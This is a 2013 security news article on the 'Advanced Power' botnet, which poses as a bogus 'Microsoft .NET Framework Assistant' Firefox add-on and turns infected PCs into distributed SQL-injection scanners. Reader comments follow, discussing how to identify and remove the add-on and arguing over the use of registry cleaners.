December 16, 2013

An unusual botnet that has ensnared more than 12,500 systems disguises itself as a legitimate add-on for Mozilla Firefox and forces infected PCs to scour Web sites for security vulnerabilities, an investigation by KrebsOnSecurity has discovered.

The botnet, dubbed “Advanced Power” by its operators, appears to have been quietly working since at least May 2013. It’s not clear yet how the initial infection is being spread, but the malware enslaves PCs in a botnet that conducts SQL injection attacks on virtually any Web sites visited by the victim.

The "Advanced Power" botnet installs itself as a legitimate Firefox extension. The malware looks for vulnerabilities in Web sites visited by the victim.

The “Advanced Power” botnet installs itself as a legitimate Firefox extension. The malware looks for vulnerabilities in Web sites visited by the victim.

SQL injection attacks take advantage of weak server configurations to inject malicious code into the database behind the public-facing Web server. Attackers can use this access to booby-trap sites with drive-by malware attacks, or force sites to cough up information stored in their databases.

Although this malware does include a component designed to steal passwords and other sensitive information from infected machines, this feature does not appear to have been activated on the infected hosts. Rather, the purpose of this botnet seems to be using the compromised Windows desktops as a distributed scanning platform for finding exploitable Web sites. According to the botnet’s administrative panel, more than 12,500 PCs have been infected, and these bots in turn have helped to discover at least 1,800 Web pages that are vulnerable to SQL injection attacks.

The fraudulent Firefox add-on.

The fraudulent Firefox add-on.

The malicious code comes from sources referenced in this Malwr writeup and this Virustotal entry (please don’t go looking for this malware unless you really know what you’re doing). On infected systems with Mozilla Firefox installed, the bot code installs a browser plugin called “Microsoft .NET Framework Assistant” (this bogus add-on does not appear to be the same thing as this add-on by the same name). The malicious add-on then tests nearly every page the infected user visits for the presence of several different SQL injection vulnerabilities.

Alex Holden, chief information security officer at Hold Security LLC, said the botnet appears to have been built to automate the tedious and sometimes blind guesswork involved in probing sites for SQL vulnerabilities.

“When you test an application for SQL injection or any other vulnerability, you have a small frame of reference as to the site’s functionality,” Holden said. “You often don’t know or can’t see many user functions. And in some cases you need proper credentials to do it right. In this case, the hackers are using valid requests within many sites that end-users themselves are feeding them. This is a much bigger sample than you would normally get. By no means it is a full regression test, but it is a deep and innovative approach.”

Holden said he believes the authors of this botnet may be natives of and/or reside in the Czech Republic, noting that a few transliterated text strings in the malware are auto-detected by Google Translate as Czech.

SQL injections are some of the most common Web site attacks partly because these vulnerabilities are extremely widespread. According to a report (PDF) released earlier this year from Web site security firm Imperva (full disclosure: Imperva is an advertiser on this site), while most Web applications receive four or more attack campaigns each month, some Websites are constantly under attack — particularly Web apps at retail sites.

Sites browsed by hacked PCs (left) and SQL injection flaws found by the botnet (masked, right)

Sites browsed by hacked PCs (left) and SQL injection flaws found by the botnet (masked, right)

Botnets like this one are a great and classic example of how compromised systems are nearly always used to chip away at the defenses of others online. Interestingly, there is a legitimate add-on for Firefox that can help passively detect SQL injection vulnerabilities on sites you visit. Site owners looking for a free tool to scan their sites for SQL vulnerabilities should check out SQLmap, an open source penetration testing tool.

Update, 6:17 p.m. ET: Mozilla has issued a statement saying that it has “disabled the fraudulent Microsoft .NET Framework Assistant add-on used by the Advanced Power botnet,” by adding the bogus add-on to its block list. Mozilla said Firefox gets a message during a check for blocked add-ons once a day — while the browser is running — and that the block does not require any user actions to take effect.

mozblock


51 thoughts on “Botnet Enlists Firefox Users to Hack Web Sites

  1. Intoy

    Hi Brian,
    can you tell us how this addon looks like in the firefox addon list? For me there is such an addon but it could also be the legimitate one saying that it adds click once support. It also has the version number 0.0.0 which looks strange but according to (http://support.microsoft.com/kb/963707/en) thats okay.
    Thanks!

      1. Diane Wilkinson Trefethen

        Hi Brian,

        Note that in Firefox, when you go to Tools>Add-ons, “Microsoft .NET Framework Assistant 0.0.0” is in Extensions, not Plugins.

        Also, Brian, could you be a bit clearer about the link you provided? You said, “Know that the link referenced there is a lie; it’s a legitimate Microsoft domain, but it has nothing to do with this plugin.” Do you mean the link you provided shows how the imposter looks or do you mean that the link shows the real Microsoft plugin so it has nothing to do with the malware of the same name? Your image shows “Microsoft .NET Framework Assistant 0.1,” not “0.0.0”. Is “0.1” a true Microsoft upgrade to the real Microsoft extension or is either “0.0.0” or “0.1” a tip off that one has the malware? Note that your image has both “Disable” and “Remove.” My Firefox “0.0.0” has only “Disable”. Is that a clue that one has one or the other?

  2. DefendOurFree

    Does this malicious plug in work with other browsers?

    1. DefendOurFree

      I’m going to assume this MS Framework can run on other browsers. I don’t see Framework listed in my browser add on list; however, I do have Silverlight running as a browser add on. And as per the Microsoft website, “Silverlight is a free plug-in, powered by the .NET framework and compatible with multiple browsers”.

    2. Sandra

      While the official Microsoft addon works with multiple browsers, the malicious addon only works on Firefox (according to the article).

      1. DefendOurFree

        Thanks; but I didn’t read the article that way. Brian described the add on in Firefox; but he did disclaimer exclusiveness.

        Brian is this exclusive to Firefox?

        1. BrianKrebs Post author

          No idea. But when I had a look at the back end system for this botnet, I only saw what that screenshot shows: page after page of mozilla firefox icons. I have nothing to suggest any other browsers were impacted.

  3. User

    Hello.

    If the link is correct than last modification of windowsclient.com.xpi was made by Thu 30 May 2013.
    Also, the algorith generating domain names is not working as expected (advpmaster122013.org,advpmaster112013.org,…) or is just the software is too old.
    Also, there is an executable(.exe) on virustotal and malwar and the extension is xpi.
    And to finish, I can see a few interesting comments like:
    …callBack(null); return;}// sdelat zapis ob oshibke
    …// sent request to verify parametr
    that indicate that the autor is most probably from russia.

  4. Sandra

    I have also “Microsoft .NET Framework Assistant 0.0.0” in my list of Firefox extensions. It is disabled.

    So can we assume if the extension is disabled, that the malware is not active? How to find out if you have the real thing from Microsoft or if you have the malware? I would be very greatful.

    Thanks, Sandra

    1. PC Cobbler

      This is what I would do. Look in Control Panel -> Programs for “Microsoft .NET Framework Assistant” and uninstall it if it exists. Save your list of Firefox bookmarks to a temporary file. Uninstall Firefox via Control Panel -> Programs. Download CCleaner from piriform.com, install it (don’t accept the free offer of Chrome), run the Registry cleaner, and run the regular Cleaner. Download the free version of Malwarebytes from malwarebytes.org, install it (don’t accept the free trial), and do a system scan with it (take the defaults if malware is found). Then reinstall Firefox and only add back the add-ons you trust, e.g. No Script.

      1. onlinekook

        Please don’t use CCleaners registry cleaning feature. As a matter of fact, don’t use ANY registry cleaners, unless you want to break your computer. The only thing you should be doing to your registry is backing it up. Really.

        1. PC Cobbler

          I use CCleaner on all of my PCs, as well as those of my customers. I have never had a problem and I do this for a living. CCleaner gives the option of making a backup of the registry so one can always revert back to the previous version. Really.

          1. Harry Johnston

            So … if you used a registry cleaner on a client computer and it broke something (fairly likely) … how would you know?

            Registry cleaners have no magical way of telling what registry entries are “no longer needed”. They just guess. If they guess wrong, well, something breaks, but the user has no way of knowing what caused the problem, so that’s all good … for the people selling the snake oil, that is.

            1. PC Cobbler

              “how would you know?”

              I would run a few tests before I returned the PC back to the customer. These would not be shots in the dark, but educated guesses based on what was removed. And if the customer complained, I would run back to fix it. But that’s never happened.

              “Registry cleaners have no magical way of telling what registry entries are ‘no longer needed’. They just guess.”

              Wrong. They compare the contents of the registry with what is installed and what directories are present.

              I do not know if all registry cleaners are trustworthy. Perhaps your comments are valid for the other ones. I only know about CCleaner.

              1. onlinekook

                Blindly running registry “cleaners” is rather irresponsible. What is it “fixing”?
                If there is a problem with the registry, then you fix that specific problem, otherwise there is no need to mess around with the registry. Sure you may “clean” your registry and not have a problem, but you run a huge risk when you blindly go in there and delete things. You may not realize a problem until weeks later when you run a program that is used infrequently.
                While you might not break the machine running a “registry cleaner” the risk is not worth it. Eventually that risk will become a real problem.

                1. Ed Tomchin

                  The solution to that problem is easy. Just back up your registry before you clean it. In fact, it’s not a bad idea to back up your registry as often as you back up your root drive.

                  1. Harry Johnston

                    But what do you do if there’s a problem six months later? You can’t just restore a six-month old registry file, that’s asking for trouble.

                2. PC Cobbler

                  @onlinekook “Blindly running registry ‘cleaners’ is rather irresponsible. What is it ‘fixing’?”

                  First, I never stated that anyone should run them “blindly”; that is your word. CCleaner should be run if a known problem exists. You do know that malware hides in the registry, right?

                  Second, what is your alternative solution for malware in the registry? You seem to be suggesting that we should just leave it there, which will allow the malware to remain. Or perhaps you are suggesting that novices use regedit, which is irresponsible advice.

                  Third, as I stated before, CCleaner gives an option of making a backup before cleaning so users can revert back to the original configuration. I would always recommend making a backup.

                  “Eventually that risk will become a real problem”

                  I run CCleaner many times per week on different systems and have yet to see a problem.

                  Disclosure: I have no financial stake in Piriform.

                  1. Harry Johnston

                    Uh … if you go back to your first comment in this subthread, you instruct a novice who may have a malware infection (but probably does not) to run CCleaner. That counts as “blindly” in my book.

                    If you’re an expert, and use CCleaner only as a tool to help locate suspicious entries, that’s a different matter.

              2. Harry Johnston

                In order for that to work reliably, the registry cleaner would have to contain an accurate database of every piece of software in existence and what registry keys it needs. That’s not going to happen.

        1. PC Cobbler

          “Given that I most probably don’t have the malicious addon, I find removing Firefox a bit overkill.”

          The operative word here is “probably.” You are much more trusting than I am. Then again, I have been known to completely reinstall Windows if something does not feel right.

  5. Ed Tomchin

    I also found “Microsoft .NET Framework Assistant 0.0.0″ on my Firefox 26.0. It was enabled but I disabled it. There does not appear to be any means of removing it however. Can you expound further on how to find out if this is malware and how it can be removed. Thank you.

  6. I thought I was computer savy.

    by CanopusArchives on September 28, 2013 · permalink · translate

    “You can only remove it when you do this:
    In Registry Editor:
    – Go to
    HKEY_LOCAL_MACHINE \ SOFTWARE \ Mozilla \ Firefox \ Extensions
    – Delete value {20a82645-c095-46ed-80e3-08825760534b}
    In Firefox:
    – Go to about:config
    – enter microsoftdotnet in Filter
    – Right-click general.useragent.extra.microsoftdotnet
    – select Reset.
    – Restart Firefox.”

    NOTE: In later editions of Firefox it is only the above key that needs to be deleted, there is no corresponding entry in about:config. Restarting Firefox after deleting the key will no longer display this add-on in add-ons

    https://addons.mozilla.org/en-US/firefox/addon/microsoft-net-framework-assist/

    1. PC Cobbler

      I will just add that regedit is serious business. Make sure you know what you are doing before you attempt it. Screwing-up the registry is one route to a new OS install.

    2. Sandra

      These are the instructions for removing the official Microsoft plugin. This will not remove the malicious addon.

  7. TheOreganoRouter.onion

    Very interesting article , where do I find more information on that ““Microsoft .NET Framework Assistant”

  8. ejonesss

    “http://krebsonsecurity.com/wp-content/uploads/2013/12/3a.png”

    looks like the botnet may be going after porn in some way

    just look at the names of the files in the last 5 window

    1. jdmurray

      The Malware searches for vulnerabilities on whatever site the user browses to, so it’s not the botnet that chose those sites.

  9. Vee

    https://www.virustotal.com/en/file/19b523e0db7d612dd439147956589b0c7fe264f1eb183ea3a74565ad20d3cb8a/analysis/1370035125/

    Looking at the VirusTotal link, at 33 / 49 this version of the thing is pretty much dead if someone at least has a even mediocre AV. (but also know they probably pump out newer versions of this thing too)

    How it’s installed is a pretty common technique I’ve seen, you know the old “Hey install this plugin to view this content click here! Adobeflash.exe”.

    1. Wladimir Palant

      Jerry, version 0.0.0 is the real add-on by the same name, produced by Microsoft – not the malware Brian talks about. In fact, 0.0.0 is the dummy version for people who opted out of ClickOnce functionality, it doesn’t do anything. Nothing wrong with removing it completely of course.

  10. Wladimir Palant

    Hi Brian,

    I couldn’t resist peeking into the source code of this add-on. Two things that stuck out to me:

    1. Mozilla’s blacklist is unlikely to have much effect because the infected browsers are extremely outdated – the add-on is only marked compatible with Firefox 2.0 to 6.0a1. “Compatible by default” was only enabled with Firefox 10 so that add-on won’t run in any newer Firefox version. Also, there is no custom update URL that could push a newer version of this add-on or override compatibility information.

    2. I found three non-English comments, Google Translate assumes one to be Czech, the other Slovenian and third is even considered to be Italian. This is pure nonsense of course because it only managed to translate a few words from the texts. In fact, these comments are quite clearly transliterated Russian, with a significant number of typos.

  11. Intoy

    Maybe one last remark. Does anybody know the Extension ID of the malware? The real one from Microsoft is {20a82645-c095-46ed-80e3-08825760534b}. You get it from Help ->Troubleshooting information. Maybe the malware author also used this ID, but maybe not 🙂

      1. Intoy

        There we go. So people who are still unsure whether they have the malware, just check the extension ID.
        Thanks Wladimir

        1. Wladimir Palant

          Nobody asking here does – I doubt that Brian has any visitors with Firefox 5. Besides, the real Microsoft .Net Assistant is a lot more widespread than this malware.

          1. Harry Johnston

            I’m not certain that the malware is limited to old versions of Firefox. Sure, you couldn’t install it on current versions via the usual method, but then it isn’t meant to be installed via the usual method – couldn’t a malicious installer trick Firefox into accepting an “outdated” extension?

            1. Wladimir Palant

              I think you are right, I jumped to conclusions here. A third-party application would need to manipulate Firefox’ extensions database directly to change the compatibility information for that add-on. Yet disabling the opt-in screen for externally installed add-ons (something that malware is bound to do) requires doing exactly the same thing, so it is possible that somebody has actually done that. Still not very likely however – why go through all the trouble instead of simply setting compatibility info correctly in the first place?

              1. Harry Johnston

                Perhaps to make it that little bit harder for white hats to diagnose, or just in the hopes of confusing people? I don’t know, perhaps they really are only targeting old versions – maybe the vulnerability they used to install was only present in those versions? – but I don’t think we can safely conclude that without more information.

  12. Jacob Goodson

    Hey! Do not start posting stuff like this! We need to make sure we keep screaming how insecure Java is and how the internet is a pristine fortress of impenetrable magic that will solve our deepest, fantastical desires!

    1. Wladimir Palant

      The important sentence is “It’s not clear yet how the initial infection is being spread” – the initial infection quite possibly happens through a Java vulnerability. The people affected didn’t update Firefox in more than two years, they likely didn’t update Java either (updating Firefox is much easier). There, now you have it.

  13. Winski

    Capital punishment – NO money…. Slap a few of the Hack Pack in the electric chair and let’s see if they keep it up..

  14. David

    Hello Brian,
    if you send me some example comment from the code, I can tell you whether it’s written in czech. It looks like our country is becoming quite popular last weeks (stolen bitcoins …)

Comments are closed.